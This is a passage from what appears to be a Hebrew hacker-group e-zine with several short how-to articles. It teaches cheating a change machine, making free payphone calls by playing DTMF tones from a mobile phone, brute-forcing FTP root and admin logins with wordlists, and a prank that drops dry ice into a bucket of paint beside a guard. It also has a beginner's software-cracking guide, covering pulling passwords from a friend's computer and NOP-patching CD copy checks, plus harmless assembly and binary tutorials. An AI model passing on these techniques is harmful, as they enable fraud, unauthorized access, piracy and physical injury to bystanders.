‫‪ )3‬מכניסים את השטר המחובר למסקנטייפ למכונה ופורטים את הכסף (אל‬
‫תעזבו את השטר!!!)‬
‫‪ )4‬מחזיקים את השטר חזק (הוא לא יקרע אם עשיתם את זה נכון)‬
‫‪ )5‬מחכים עד שהמכונה עוזבת את השטר ובבית מוציאים את המסקנטייפ‬
‫כל היופי בדבר הזה שאפילו אם השטר נקרע‪ ,‬עדיין קיבלתם את הסכום שלו‬
‫חזרה במטבעות ‪( ):‬ואפשר להדביק אותו חזרה ‪ ...‬ועוד לקנות דברים בזה )‪.‬‬

e-man [i.c.f]

‫דיבור ללא תשלום בטלפון ציבורי‬
‫זוהי הכתבה הראשונה של מילקי ‪ -‬אני צופה לו עתיד מזהיר‪...‬‬
‫אני רוצה להתקשר לחבר שלי ! ואני לא רוצה להוציא שיחה מהפלאפון שלי כי זה עולה כסף !!‬
‫ואין לי הרבה טוקמן ! או שאני דיברתי יותר מידי החודש ! זה לא משנה ! העיקר שזה חינם !‬
‫מצרכים‪:‬‬
‫פלאפון מהסוגים הבאים נוקיה }משחקים בדוק{‬
‫סמסונג ! ועוד אני בדקתי על הסוגים האלה !‬
‫הפעולה‪:‬‬
‫אז עכשיו נלמד איך בדיוק עושים זאת !!‬
‫הולכים לטלפון ציבורי }רק על זה בדקתי{ ומצמידים את הפרסקת של הפלאפון לפומית של הטלפון‬
‫הציבורי ! ומתחילים לחייג את המספר בפלאפון ! אבל לא לחייג כי זה יעלה לכם כסף !‬
‫אז פשוט ללחוץ את המספר‬
‫דוגמא ‪ :‬המספר של חבר שלי הוא ‪ 12345‬נגיד טוב ! אז ככה אני מצמיד את הבפרסקת }מאיפה‬
‫ששומעים{ של הפלאפון שלי !! לאיפה שמדברים בטלפון הציבורי ! ואני מתחיל לחייג את המספר שלו‬
‫‪ 1234‬ולא לוחץ ‪send‬‬
‫בשום אופן כי אז זה יעלה כסף ! אבל ברגע שאני רושם את המספר והטלפון ציבורי שומעה את‬
‫המספרים ! והוא מתחיל לחייג ! יש טלפונים ציבורים ! שזה לא עובד עליהם זה מחייג אתה יכול‬
‫להגיד מילה ‪ 3‬שניות וזה מנתק אבל יש טלפונים שזה חופשי !!! אז מנצלים }חורשים עליו{‬
‫ליד הבית שלי אין טלפון כזה אבל יותר רחוק מצאתי טלפון ! רובם לא עובדים אבל יש גם שכן וזה‬
‫שווה ! אז תיהנ‪!!! ‬‬
‫]‪by milki [i.c.f‬‬
‫‪...‬הוספה‬
‫השיטה עובדת גם על טלפונים עם מטבעות ‪ ( .‬כאלה שיש בחנות ‪ ,‬בבתי חולים ‪ ,‬בבית ספר ועוד‪)...‬‬
‫‪ .‬עושים אותו דבר מצמידים את הפלאפון לוחצים מספרים וזה מחייג‬
‫]‪by old-hacker[i.c.f‬‬

‫כוח ברוטלי‬
‫שלום לכולם ‪ .‬זה אני‪.old-hacker‬‬
‫‪ .‬תמיד חלמתם להריץ סיסמאות (‪ 010110‬כמו בסרטים ) וזה בדיוק מה שזה כוח ברוטלי‬
‫עם כוח ברוטלי אפשר לפרוץ לכל מקום באינטרנט ‪ :‬אתרים ‪ ,‬אי מאיילים ‪ ,‬אי סי קיו ‪ ,‬מירק ועוד ‪...‬‬
‫‪(...(.‬פשוט הכל‬
‫טוב אז ככה ‪ -‬כוח ברוטל י היינו שיטה אשר מנסה לגלות את הסיסמא של דבר מסוים ע"י צירוף של‬
‫‪ .‬כמה מספריים \ אותיות‪ +‬ניסיונות רבים ‪ -‬חוזרים ונשנים‬
‫למשל ‪ :‬אם אני רוצה לפרוץ ל ‪...(ftp‬של אתר שקוראים לו זזז ( סתם‬
‫‪ :‬אז הכתובת‬
‫‪ftp.zzz.com‬‬
‫וה ‪ user name‬יהיה לרוב ‪:‬‬
‫‪root in unix\linux server‬‬
‫‪admin or administrator in nt\2k server‬‬
‫‪ ...‬ואת הסיסמא תנו לתוכנת כוח ברוטלי לחפש‬
‫התוכנה שאני הכי אוהב לכוח ברוטלי היא*‪ brute force‬שאפשר‬
‫‪.‬להוריד אותה באגף ההורדות באתר שלי‬
‫‪ :‬טוב לתוכנה יש שתי אפשרויות של חיפוש‬
‫‪word list‬‬
‫‪brute force‬‬
‫מה זה‪?word list‬‬
‫זה ניסיון פריצה בעזרת מילונים שזה קובץ עם מספר רב של מילים שמנהל האתר אולי חשב עליהם‬
‫‪ ...‬כסיסמא‬
‫אפשר להשיג כאלה המון באינטרנט למשל קובץ של ‪ 20‬מגה שנפתח ל‪ 80‬מגה רק של מילים ( אני‬
‫‪ (.‬משתמש רק בו ‪ ...‬הכי טוב‬
‫‪http://hackersclub.com/km/files/password_cracker/wordlists/hh_dictall.zip‬‬
‫מה זה‪burte force‬‬
‫זוהי פונקציה שאומרת למחשב להתחיל להריץ סיסמאות ‪ ...‬זה מחיל ב‬
‫‪aa‬‬
‫‪ab‬‬
‫…‪ac‬‬
‫‪ .‬וככה זה ממשיך עד שזה מוצא את הסיסמא‬
‫אני ממליץ להשתמש במילונים משום שיש שם את המילים הנפוצות ביותר ‪(..‬וגם בגלל שאני*‬
‫‪...(.‬משתמש בזה‬
‫]‪by old-hacker [i.c.f‬‬

‫פצצת צבע‬
‫‪ :‬מצרכים‬
‫( צבע והרבה ‪ -‬מומלץ להתחלק במחיר עם כמה חברים ‪( ...‬ולדלל עם מים כדי שיצא יותר צבע‬
‫(לבוש ישן (מומלץ שחור‬
‫חוש התמצאות‬
‫מומלץ חברים‬
‫קרח יבש‬
‫לבוא יום אחד ולארגן ‪ 5‬חברים שכל אחד מביא כמה כסף וקונים צבע ( תיקנו את הכי זול שיש)‬
‫לוקחים מים ומערבבים עם הצבע ‪ .‬בבקר למחרת באים ושמים את הצבע בפח מקרבים אותו לשומר‬
‫ושמים את הקרח היבש בפנים … ואז צועקים " פצצה " ובורחים משם מהר ואז יש ספלאש‪...‬‬
‫‪by cool-guy && blackdeath && old-hacker‬‬

‫המדריך ל‪ cracker‬המתחיל \‪zeos /‬‬
‫===========================‬
‫תוכן עניינים‪:‬‬
‫=============‬
‫א‪.‬מבוא‬
‫ב‪.‬מה זה פיצוח‬
‫ג‪.‬מטרות הפיצוח‬
‫ד‪.‬חוקיות‬
‫ה‪.‬ידע נדרש‬
‫ו‪.‬ידע חובה‬
‫ז‪.‬כלים נפוצים למפצח‬
‫ח‪.‬הורדת הכלים‬
‫ט‪.‬תודות‬
‫א‪ .‬מבוא‬
‫=======‬
‫לפני שאני ימשיך עם המדריכים המורכבים יותר כתבתי את המדריך הזה שכולל בתוכו דברים שכל‬
‫מי שרוצה‬
‫להיות מפצח צריך לדעת וגם תוכנות שונות שצריך להשיג ומאיפה להשיג‪.‬‬
‫}הערה‪ :‬סוג הפיצוח שמדובר הוא פיצוח תוכנות ולא אתרי אינטרנט או משהו אחר אם חשבת{‬
‫ב‪ .‬מה זה פיצוח‬
‫==============‬
‫לפצח זה להתעלות על מערכות הגנה (הכוונה לתוכנות בד"כ במדריכים שלי) ולנתב אותם לכל צורך‬
‫שאתה רוצה‪ .‬או לשנות כל דבר במחשב כך שיפעל כמו שאתה רוצה‪.‬‬
‫ג‪ .‬מטרות הפיצוח‬
‫===============‬
‫נגיד והורדת תוכנה אבל ‪ ,‬התוכנה מוגבלת ל ‪ 30 -‬יום ‪ ,‬מה תעשה? או שתקנה אותה (דבר שקורה‬
‫לעיתים נדירות מאוד) או שבמקרה של המפצח תפצח אותה‪ .‬כלומר תעשה שהיא תהפוך להיות‬
‫מוגבלת ל ‪40‬‬
‫יום או משהו כזה‪ ,‬דבר שלא אפקטיבי כל כך או שבכלל אפילו תשתק אותה ככה שהיא לא תהיה‬
‫מוגבלת‬
‫לשום ימים‪ ,‬בקיצור ‪ -‬לחסל לה את מנגנון ההגנה (מועה עה עה עה עה עה!!!! ‪):‬‬
‫עוד דוגמא למה אפשר לעשות עם פיצוח היא נגיד והורדת קובץ ‪ zip‬אבל אתה מגלה שאין לך סיסמא‬
‫אליו‪ ,‬אם תפצח את ההגנה שלו תוכל לקבל מהקובץ עצמו את הסיסמה הנכונה‪ .‬ולא רק לקובץ ‪zip‬‬
‫אלא‬
‫גם למלא סוגים אחרים של סיסמאות מ ‪ word‬ועד לסיסמא של הפנטגון ‪):‬‬
‫הדבר הכי נחמד לדעתי (למרות שהוא לא דורש תחכום רב) שאפשר לעשות עם פיצוח היא להכין‬
‫טריינרים ‪ trainers‬למשחקים‪ .‬מה‬
‫זה אומר ? נגיד אתה משחק במשחק כלשהו ואין לך כוח להפעיל קודים‪ .‬אתה מפעיל את הטריינר‬
‫שזאת‬
‫תוכנה שבעצם מפעילה מעיין קודים בשבילך‪ .‬הרבה מפצחים בונים טריינרים וכי חשוב לציין כי מי‬
‫שרוצה לתכנת טריינרים חייב לדעת לתכנת בשפות אחרות כדוגמת ‪ vb‬או ‪ c++‬או להשתמש ביוצר‬
‫טריינרים (פחות מומלץ) ‪.‬‬
‫נגיד קיבלת איזה דמו ‪ demo‬ממגזין משחקים או מה שלא יהיה‪ .‬במרבית הדמואים הם בעצם‬

‫משחקים מלאים! וכל מה שאתה צריך‬
‫זה קצת לשחק עם ההגדרות שלהם בעזרת פיצוח ו‪-‬וואלה! יש לך משחק מלא ‪.‬‬
‫אוקיי‪ ,‬דוגמה אחרונה למה שאפשר לעשות עם פיצוח היא נגיד שאתה בא למחשב של חבר שלך ורוצה‬
‫להוציא כל סיסמה שיש עליה **** (כמעט כל סיסמא) ‪ ,‬אז אתה חושב לעצמך ‪" -‬אם רק יכולתי‬
‫לראות‬
‫מה יש מאחורי ה **** " באמצעות פיצוח תוכל "לשלוף" את הסיסמא בקלות מתוך הכוכביות ואפילו‬
‫יותר‪...‬‬
‫אני יכול לתת לך עוד שמונת אלפים ארבע מאות דוגמאות אבל אני מאמין שתפסת את העיקרון‪...‬‬
‫ד‪ .‬חוקיות‬
‫=========‬
‫פיצוח אינו חוקי‪ .‬כי אתה עובר על זכויות יוצרים וכו' ‪ ,‬אבל אם אתה לוקח על עצמך את הסיכון‬
‫שיתפסו אותך (מאוד נדיר) אז סבבה‪ .‬אני מאמין שכל מה שאתה עושה במחשב שלך הוא עניינך בלבד‬
‫וכל עוד‬
‫לא תמכור אותו או תשווק אותו הוא נחשב לדי חוקי‪ ,‬אבל החוק לא כזה‪)0: ...‬‬
‫ה‪ .‬ידע נדרש‬
‫===========‬
‫לא כל אחד יכול לפצח‪ .‬אם אתה נהנה לצ'טט באינטרנט ולשחק במחשב אולי עדיף שתלמד משהו‬
‫אחר‪.‬‬
‫מי שרוצה להיות מפצח חייב שיהיה לו ידע באלגוריתמיקה כלשהיא (הכוונה לשפת תכנות) ‪ ,‬אני לא‬
‫מתכוון‬
‫לשפת תכנות בסיסית מאוד כמו ‪ qbasic‬אלא מהשפות היותר מתקדמות כדוגמת ‪ vb‬או ‪ c++‬אפילו‬
‫פסקל תתפלא‬
‫או לא יכולה לעזור לך ביסודות הפיצוח או יותר נכון ביסודות התכנות שמנחים את הפיצוח‪.‬‬
‫כשאני מדבר על אלגוריתמיקה אני מדבר על כל מה שקשור בלולאות‪ ,‬תנאי‪ ,‬פונקציות וכל מה‬
‫שלוגיקה ממוחשבת כוללת בתוכה‪.‬‬
‫ו‪ .‬ידע חובה!‬
‫============‬
‫אני ממליץ אחרי שיש לך ידע בשפה מסוימת או בכמה שפות להתחיל ללמוד את השפה אסמבלי‬
‫(שנקראית גם אסמבלר או בקיצור ‪)asm‬‬
‫שהיא הבסיס לפיצוח‪.‬‬
‫השפה אסמבלי היא הבסיס לכל השפות ניתן לומר מפני שהיא ממירה את התוכניות שאתה יוצר‬
‫כמעט באופן ישיר אל המחשב דבר שיעזור לך‬
‫לנתח פעולת תוכניות שונות‪( .‬מדריך על אסמבלר ניתן למצוא באתר ‪)ihc‬‬
‫ז‪ .‬כלים נפוצים למפצח‬
‫====================‬
‫אוקיי‪ ,‬בהיותך מפצח תתקל באחד מהכלים הבאים (שאני לרוב משתמש)‪:‬‬
‫*‪ - w32‬סוג של דיסאמבלר ‪ -‬דיסמבלאר הוא כלי שנותן לך לראות את קוד התוכנית אותה אתה מנתח‬
‫בשפת אסמבלי‪ .‬משתמשים בדיסאמבלר‬
‫‪ w32‬בד"כ אם כי אני מאמין כי דיסאמבלרים אחרים כדוגמת זה של ‪ borland‬גם יכולים להיות‬
‫טובים‪.‬‬
‫*‪ - hworks‬נקרא גם בשם ‪ , hw‬כלי זה מציג את התוכן של קובץ בבסיסים הקסדצימליים (בסיסי ‪)16‬‬
‫‪ ,‬לעוד פרטים על הבסיס‬
‫ההקסדצימלי קרא את המדריך שלי על "בסיס הקסדצימלי שנמצא ב ‪ ihc‬או קרא מכל מקום אחר‪.‬‬

‫דוגמא לעוד עורך הקסדצימלי טוב‬
‫חוץ מ ‪ hworks‬הוא ‪. axe‬‬
‫*‪ - softice‬כלי זה הדיבאגר ‪ ,‬החזק מבין כולם כנראה ‪ -‬נותן לך תצוגה "חיה" של הקובץ אותו אתה‬
‫מנתח באסמבלי ‪ ,‬כלומר הוא נותן לך‬
‫לבדוק תוך כדי ריצה של התוכנית מה קורה שם‪ ,‬וע"י הזנת נקודות עצירה ‪ bpx‬לתוכנית ניתן לראות‬
‫שיגרות חיוניות שיעזרו‬
‫לך להוציא את מה שאתה רוצה מהתוכנית‪.‬‬
‫אני אישית לא משתמש ב ‪ soft ice‬כי היא עושה לי בעיות ‪ ,‬אבל רוב המפצחים משתמשים בה ואולי‬
‫גם אני יעבור‬
‫לדיבאגר הזה בחזרה (פעם השתמשתי בו‪ . )...‬חוץ מהדיבאגר הזה תוכל להשתמש גם בדיבאגרים‬
‫כדוגמת ‪ pc-watch‬או ‪ trw‬שנחשבים‬
‫לדיבאגרים מצוינים וכן לעוד הרבה רבים‪...‬‬
‫*מפצח משחקים ‪ - game cracker‬מוכר פחות למפצחים ‪ ,‬כלי זה נותן לך להוציא ממשחק מחשב‬
‫מסוים נקודות ערכים חשובות‪,‬‬
‫כדוגמאת ‪ :‬נקודות חיים‪ ,‬יריות וכו' הוא עוזר בבניית ‪ trainers‬ונותן למפצח את כל המידע לגבי נתוני‬
‫המשחק‪.‬‬
‫מפצח משחקים נמצא (לפחות שלי) בתוך אחד ה ‪ trainers‬שהורדתי‪ ..‬ברגע שאכתוב מדריך על‬
‫טריינרים (מדריך ענק) אכתוב גם‬
‫איפה למצוא את מפצח המשחקים ומה ניתן לעשות איתו‪.‬‬
‫*יוצר פאטצ'ים ‪ - patch creator -‬בזה משתמשים כדי ליצור קראק (קובץ שמשנה את ההגנה של‬
‫תוכנה מסוימת) ‪ .‬אם‬
‫ברצונך ליצור קראק משל עצמך אתה צריך את התוכנה הזאת כי היא יותר נוחה‪ ,‬אם כי יש מפצחים‬
‫שבונים ללא שום יוצר פאטצ'ים‪.‬‬
‫ח‪ .‬הורדת הכלים‬
‫==============‬
‫כל אתר קראקינג שמכבד את עצמו ישים את הכלים האלה‪ .‬נכון לעכשיו ניתן למצוא את הכלים‬
‫באתר ‪ihc - www.ihc-net.org‬‬
‫או שפשוט לכו למנוע חיפוש ותקישו ‪. cracking‬‬
‫אפשר גם להוריד את רוב התוכנות ויותר באחד מהאתרים האלה ‪ http://hackersclub.com :‬או‬
‫‪www.crackstore.com‬‬
‫‪by zeos‬‬

‫אסמבלר למפצח‬
‫=============‬
‫שלום לכולם זהו המדריך הראשון שלי בנושא פיצוח במדריך תמצא פקודות בסיסיות‬
‫באסמבלר שיעזרו לך להבין מה קורה בתוכנה שאתה מנסה לפצח‬
‫‪call‬‬
‫‪---‬‬‫משמש‪ :‬קריאה לכתובת‬
‫פעולה‪ :‬קורא לפונקציה בכתובת "הכתובת"‬
‫דוגמא ‪call 10284312 :‬‬
‫אחרי הקריאה לפונקציה התוכנית תמשיך לשורה הבאה‬
‫‪cmp‬‬
‫‪--‬‬‫פעולה‪ :‬השוואה כלשהי בתוכנית למשל השוואה בין הסריאל שאנחנו הכנסנו לסיראל‬
‫של התוכנית‪ ,‬בדיקה אם התוכנית רשומה‬
‫דוגמא ‪cmp ax,03h :‬‬
‫בדרך כלל תמצא קפיצה כלשהי אחרי ההשוואה‬
‫‪jmp‬‬
‫‪--‬‬‫פעולה‪ :‬הפקודה הזאת די דומה ל ‪ goto‬היא קופצת למקום כלשהו בתוכנית‬
‫דוגמא ‪jmp 00402011 :‬‬
‫יש כמה סוגים של קפיצות לדוגמא‪:‬‬
‫‪ - je‬קפיצה אם הערך שווה נכון‬
‫‪ - jne‬קפיצה אם הערך שווה לא נכון‬
‫הקפיצה באה בדרך כלל השוואה (‪ )cmp‬לדוגמא‪:‬‬
‫‪ : cmp realserial,badserial‬השוואה בין הסיראל האמיתי לסיראל שלנו‬
‫‪ : jne goawaybadcracker‬קפיצה אם הסיראל שלנו לא שווה‬
‫‪mov‬‬
‫‪--‬‬‫פעולה‪ :‬העתקת ערך של מילה מהמקור ליעד‬
‫דוגמא ‪mov ax,dx :‬‬
‫אתה תראה את הפקודה הזאת המון בתוכנית בדרך כלל זה משמש כפעולת השמה‬
‫‪ret‬‬
‫‪--‬‬‫פעולה‪ :‬חזרה מפונקציה‬
‫דוגמא ‪ret :‬‬
‫בדרך כלל אתה תראה את הפקודה הזאת בסוף פונקציה‪ ,‬היא משמשת כחזרה לקריאה‬

‫זהו לבנתיים מקווה שעזר לכם‪.‬‬
‫המדריך נכתב על ידי‪vbman :‬‬
‫שלחו לי תגובות או שאלות ל ‪elidor86@hotmail.co.il‬‬

‫איך להפוך מספרים בינארים לעשרוניים וההפך‪.‬‬
‫בינארי ‪:‬‬
‫בינארי היא שפת מכונה שהמחשב מבין‪.‬‬
‫התחום של בינארי הם המספרים ‪.0,1‬‬
‫אתם בטח אומרים לעצמכם אז איך אני עושה מבינארי מספרים‪ ,‬אותיות רגילות‬
‫אז על מספרים במדריך הזה אני אכתוב על אותיות יותר מאוחר‪.‬‬
‫במדריך אחר‪.‬‬
‫איך אני הופך מבינארי לעשרוני‪.‬‬
‫הסבר ודוגמא‪:‬‬
‫ניקח את המספר ‪ ,00110011‬בחישוב מהיר הוא מסמל את המספר ‪.51‬‬
‫אוקי איך עשיתי את זה‪.‬‬
‫הנה היא הטבלה של הבינארי ‪ -‬במחשבים‪.‬‬
‫‪4‬‬
‫‪8‬‬
‫‪16‬‬
‫‪32‬‬
‫‪64‬‬
‫‪128‬‬
‫נכניס את הבינארי מתחת‪.‬‬
‫‪0‬‬
‫‪0‬‬
‫‪1‬‬
‫‪1‬‬
‫‪0‬‬
‫‪0‬‬

‫‪2‬‬

‫‪1‬‬

‫‪1‬‬

‫‪1‬‬

‫עכשיו אם יש מתחת לספרה האמיתית ‪ 0‬אז המספר שווה אפס אבל אם יש אחד אז הוא שווה כמה‬
‫שכתוב מעל ה‪.1‬‬
‫למשל‪:‬‬
‫יש אחד מעל האחד אז זוכרים ‪ ,1‬יש אחד מעל ה ‪ ,2‬זוכרים עוד ‪,2‬‬
‫וכו' עד שמגיעים ל‪.51 = 1+2+16+32 :‬‬
‫ברור ? אני אתן לכם פה תרגילים או שתיים‪:‬‬
‫‪? = 11001100‬‬
‫‪? = 00000010‬‬
‫בראשון אמור לצאת ‪.204‬‬
‫בשני אמור לצאת ‪.2‬‬
‫אני מקווה שהבנתם אם לא תקראו שוב כי זה לא ממש קשה‪.‬‬
‫עכשיו איך הופכים מעשרוני לבינארי? זה קצת יותר מסובך אבל עדיין נכנס להגדרה של קל‪.‬‬
‫ניקל את המספר ‪ 143‬ואז מה עושים ?‬
‫‪1‬‬
‫‪2‬‬
‫‪4‬‬
‫‪8‬‬
‫‪16‬‬
‫‪32‬‬
‫‪64‬‬
‫‪128‬‬
‫יאללה בוא נתחיל‪ ,‬משמאל לימין‪,‬‬
‫האם ‪ 143‬נכנס בתיבה של ‪ ,128‬אם הוא גדול מ ‪ 128‬זה אומר שכן‪ ,‬אז נרשום שם אחד‪.‬‬
‫עכשיו נשאר לנו ‪.)143-128( 15‬‬
‫נמשיך‪ 15 ,‬נכנס ב ‪ ,64‬לא‪ .‬נכתוב שם אפס‪ ,‬האם ‪ 15‬נכנס ב ‪ ,32‬גם לא‪ ,‬נשאיר שם אפס‪.‬‬
‫‪ 15‬לא נכנס ב ‪ ,16 -‬אז נכתוב גם שם ‪.0‬‬
‫‪ 15‬נכנס ב ‪ ,8‬כן אז נכתוב שם אחד ונשאר לנו ‪. )15-8( 7‬‬
‫‪ 7‬נכנס ב ‪ ,4‬כן נכתוב אחד ונשאר לנו ‪)7-4( 3‬‬
‫‪ 3‬נכנס ב שתיים‪ ,‬כן נכתוב שם אחד ונשאר לנו אחד (‪.)3-2‬‬
‫ועכשיו נשאר אחד והוא מתאים בול לאחד בסוף אז גם שם נכתוב ‪.1‬‬
‫איזה בינארי יצא לנו ?‬
‫‪10001111‬‬
‫הבנתם‪ ,‬אני ממש מקווה אבל אם לא אז תקראו שוב‪ ,‬כי זה נכנס למוח בפעם השנייה‬
‫‪2‬‬
‫‪4‬‬
‫‪8‬‬
‫‪16‬‬
‫‪32‬‬
‫‪64‬‬
‫‪128‬‬
‫‪1‬‬
‫‪1‬‬
‫‪1‬‬
‫‪0‬‬
‫‪0‬‬
‫‪0‬‬
‫‪1‬‬
‫אוקי אז עכשיו תתרגלו את זה עד שתעשו את זה בלי דף נייר ובלי מחשבון (שזה הדרך הקלה)‪.‬‬
‫‪by zeos & pirs[i]ng‬‬

‫‪1‬‬
‫‪1‬‬

‫פיצוח הגנות ‪ \ cd‬גרסה ‪1.1‬‬
‫מאת‪zeos :‬‬
‫הקדמה‪ :‬כתבתי את המדריך הזה לצורכי לימוד בלבד‪ ,‬כל נזק שיגרם למחשבך ו\או כל פעילות בלתי‬
‫חוקית שתעשה הנם על אחריותך בלבד‪ .‬אם אתה רוצה להפיק כסף מהפיצוח ע"י דרך כלשהי אנא‬
‫הפסק לקרוא!‬
‫קריאה מהנה ‪zeos -‬‬
‫אוקיי ‪ ,‬אז מה השיטה שאנחנו עובדים עליה?‬
‫בשביל לפצח ‪ , cd‬או יותר נכון את ההגנה של ה ‪ cd‬שמונעת ממך לעשות כלשהם פעולות כגון העתקה‬
‫‪ ,‬שינוי או כל דבר אחר אנחנו נשתמש בשיטה מאוד בסיסית שבעצם מנטרלת את כל פעולות‬
‫ההשוואה שבודקים את חוקיותו של הדיסק‪ .‬השיטה מאוד בסיסית ולכן גם מאוד קלה ולא כל כך‬
‫מקצועית אך היא טובה מאוד לעיתים רבות שכן לא רבים מן המתכנתים שבונים את הדיסקים‬
‫מתעניינים באבטחתם ואנחנו המפצחים נהנים מכך ‪ ):‬חשוב מאוד ‪ :‬גבה את קבצי המשחק לפני‬
‫שתעשה כל פעולה אתם ‪ -‬שימוש לא נכון יכול לגרום להרס‪.‬‬
‫כלים וידע‪:‬‬
‫למעשה‪ ,‬לא כל אחד יכול לפצח ‪ , (:‬לי לקח משהו כמו כמה חודשים טובים עד שקלטתי והצלחתי‬
‫לפצח ברמה בינונית‪ ...‬הידע שתצטרך צריך להיות כללי מאוד בתחום המחשבים ‪ :‬בסיסים ‪ ,‬תווי‬
‫אסקי אלגוריתמיקה מתקדמת‪ ...‬חוץ מזה עדיף שתלמד קצת אסמבלי שכן אסמבלי נחשבת לשפה‬
‫גבוהה מאוד ומכנים אותו גם "שפת סף" ‪ ,‬שכן היא נחשבת ל"אמא של כל השפות"‪ .‬אם יש לך את‬
‫הידע המתאים לא תתקל בכל קשיים‪...‬‬
‫במדריך זה השתמשתי בשני דברים לפיצוח ‪:‬‬
‫‪.1‬דיסאמבלר (עושה הפוך מאסמבלר ‪ -‬הופך קובץ אחרי הידור משפת מכונה לשפת אסמבלי כדי‬
‫שנבין מה קורה)‬
‫‪ .2‬עורך הקסדצימלי ‪. hworks‬‬
‫את שני אלה ניתן להשיג ברחבי הרשת‪..‬ממש לא בעיה להשיג אותם‪.‬‬
‫שלב ‪ : 1‬בדיקת הודעת הדיסק‪.‬‬
‫אוקיי ‪ ,‬הרץ את המשחק ללא הדיסק ‪ ,‬המשחק לא יעבוד (אל תבהל) ‪ ,‬אבל שים לב להודעת השגיאה‬
‫שקופצת כאשר אתה מפעיל את הקובץ ללא הדיסק ‪ .‬רשום לך אותה וזכור אותה לאחר מכן‪ .‬יכול‬
‫להיות שאתה לא חושב שהיא חשובה אבל היא חיונית מאוד למפצח‪.‬‬
‫שלב ‪ :2‬פותחים את הקובץ להסתכלות ראשונית‪.‬‬
‫אוקיי ‪ ,‬אחרי שרשמנו לעצמנו את ההודעה נעבור לדיסאמבלר ‪ w32‬ונפתח את קובץ ה ‪ exe‬שהפעלנו‬
‫בהתחלה‪ ,‬פעולה זאת לוקחת כמה זמן ‪ ,‬שתה משהו וחזור לפה ‪):‬‬
‫אוקיי ‪ ,‬זה גמר לעשות את הפעולות שלו ‪ -‬קדימה לעבודה ‪ -‬לחץ על הכפתור למעלה שכתוב עליו‬
‫‪ strn.ref‬שמפרש לנו את משפטי התוכנית כדי שנבין מה עושה כל מה (תלמד להשתמש בזה עוד הרבה‬
‫כמפצח‪ )...‬הכפתור נמצא צמוד לכפתור ההדפסה ‪ .‬או הנה עכשיו אנחנו רואים כל מיני משפטי תוכנית‬
‫שנוצרו כתוצאה מכל קוד התוכנית באסמבלי ‪ -‬עכשיו בוא נמצא את הודעת השגיאה שרשמנו‬
‫ממקודם מבין כל המשפטים ששם ‪ ,‬לחץ על המשפט פעמיים והדיאסמבלר יזניק אותך למקום שבו‬
‫נמצאת הפרוצדורה הממונה על המשפט ‪ .‬עכשיו מגיע חלק קצת קשה למי שמבין קצת באסמבלי יהיה‬
‫קל‪ :‬כפי שהוסבר למעלה המטרה שלנו זה לנטרל את כל גורמי ההשוואה בתקווה שאחד מהם ינטרל‬
‫את בדיקת החוקיות של הדיסק‪ .‬אז אנחנו צריכים למצוא בין כל המשפטים של המשפט‪ .‬את אותם‬
‫המשפטים שמורים על קריאה לפונקציה ‪ , call -‬קפיצה ‪ jmp -‬או קפיצה כאשר שווה ‪ - jne‬ואף עוד‬
‫סוג קפיצה ‪. je -‬בקיצור כל פקודה המראה על קריאה ‪ ,‬או קפיצה ‪ .‬שים לב שכאשר אתה עובר על‬
‫משפט קפיצה‪ ,‬קריאה ‪ -‬השורה תסומן בצבע ירוק‪ ,‬עכשיו כל שורה שכזאת בתוך השיגרה של ההודעה‬
‫בלבד תסתכל למטה ותראה נתונים על המשפט ‪ -‬תראה שכתוב ‪ @ offset xxxxh‬כאשר ‪ xxxx‬הוא‬
‫המספר שאנחנו צריכים ‪ -‬ללא ה ‪ . h‬כתוב כל מספר כזה שמצאת בשורות ‪ -‬אל תשכח לוודא שהשורה‬

‫הופכת להיות בצבע ירוק מתי שיש את הפקודות אותן אנו צריכים לנטרל‪.‬‬
‫שלב ‪ :3‬נטרול ההגנה‬
‫אוקיי מפה זה כבר די קל‪ ,‬צא מתוך ‪ w32‬ולך לעורך הקסדצימלי ‪ hw‬שלנו ‪ ,‬פתח את הקובץ והקש ‪f5‬‬
‫שזה ‪ - goto‬רשום את המספר הראשון והעורך יזניק אותך למקום שלו בעורך ההקסדצימלי ‪ ,‬בשלב‬
‫הזה בוא ותלמד משהו קטן ‪ :‬נגיד והמספר שרשמנו הוא ‪ 0003eb2a‬זה אומר כי יש לנו ‪ 4‬בייט ‪ -‬כל‬
‫‪ 2‬מספרים הם בייט אחד (הקסדצימלי זה בסיס ‪ 16‬ואילו בייט זה בסיס ‪ )8‬ככה שהמספר בעצם אמור‬
‫להראות כך‪:‬‬
‫‪ eb-2a-00-03‬כלומר ‪ 8 :‬מספרים = ‪ 4‬בייט‪ .‬אוקיי ‪ ,‬אחרי שתפסת את זה בוא ונמשיך‪ ...‬אחרי‬
‫שהבנת את מספר הבייטים במספר שלך ‪ -‬כתוב במקום כל זוג מספרים את המספר ‪ 90‬כלומר ‪00- :‬‬
‫‪ , eb-2a = 90-90-90-90-03‬אם יש לך עוד מספרים עשה אותו דבר לכולם ושמור את הקובץ ‪.‬‬
‫במזל טוב ואם עשית הכל נכון ‪ -‬פרצת את ההגנה של הדיסק ‪ -‬צ'פר את עצמך ושחק במשחק עד‬
‫הבוקר‪): ...‬‬
‫שלב ‪ :4‬הערות ומסקנות‬
‫אם אתה כבר פה בוא ותקשיב קצת על פיצוח‪ .‬הפיצוח שאנחנו עשינו במדריך זאת היא פריצת הגנה‬
‫שזאת הפריצה שנחשבת לאחת הקלות ‪ .‬סגנון הפיצוח הזה הוא מאוד נפוץ ואפשר לראות זאת מכיוון‬
‫שבכל מקום כמעט אפשר לקנות דיסק צרוב במעט מאוד כסף מה שדי מעציב את היוצרים החוקיים‬
‫אך מעציב גם אותנו הצרכנים שנאלצים לשלם מחיר יקר רק בגלל "שהמשחק חוקי" ולכן זאת גם את‬
‫המטרות שבפיצוח‪ .‬עוד סוג נוסף של פיצוח הוא פיצוח הסיסמאות החביב עליי‪ .‬בפיצוח הזה לוקח‬
‫המפצח תוכנה עם מגבלת סיסמא ומנסה להוציא את האלגוריתם של הסיסמא או את הסיסמא‬
‫הנכונה לנתונים מסוימים ‪ ...‬יכולה להיות קלה ויכולה להיות גם קשה מאוד ולעיתים גם קשה וכמעט‬
‫בלתי אפשרית‪.‬‬
‫מקווה שנהניתם מהמדריך ‪( zeos -‬נמצא בד"כ בשרת ‪ ivrit.co.il‬חדר ‪#‬אבטחה או ‪#‬עברית )‬
‫אם אתה מתעניין בפיצוח ורוצה להיכנס קצת יותר לעומק חפש את המילה ‪ crack‬במנועי החיפוש‬
‫השונים‪.‬‬
‫תודה רבה לאנשי ‪ hacker.co.il‬שדחפו אותי לפיצוח ‪):‬‬
‫‪by zeos‬‬

‫קידוד והצפנה‬
‫תוכן עניינים‪:‬‬
